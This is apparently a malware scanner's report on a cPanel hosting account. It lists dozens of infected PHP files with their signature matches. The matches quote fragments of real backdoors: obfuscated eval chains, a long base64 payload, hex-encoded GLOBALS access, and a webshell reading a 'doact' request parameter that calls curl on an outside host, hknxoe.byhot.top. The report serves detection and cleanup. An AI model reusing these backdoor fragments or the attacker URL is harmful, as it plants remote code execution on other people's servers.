| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/webalizer/asspiss.tube.turtlesys.net/text.php Size: 1.49 kB Created: 2023-10-18 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/webalizer/snb.properties.turtlesys.net/checkbox.php Size: 1.49 kB Created: 2023-07-20 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/webalizer/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/tmp/webalizer/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/webalizerftp/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/webalizerftp/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/tmp/pma_template_compiles_turtle/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/horde/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/tmp/text.php Size: 1.49 kB Created: 2023-08-04 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/tmp/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/var/cpanel/styled/admin.php Size: 1.49 kB Created: 2023-10-13 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/var/cpanel/admin.php Size: 1.49 kB Created: 2023-02-21 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/var/cpanel/about.php Size: 1.49 kB Created: 2023-06-18 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/var/cpanel/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/var/text.php Size: 1.49 kB Created: 2023-10-18 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/var/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/.cpaddons_upgrade/index.php Size: 14.35 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 7
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 531da465 Dangerous Malware Signature (hash: 531da465) | <?php <?php
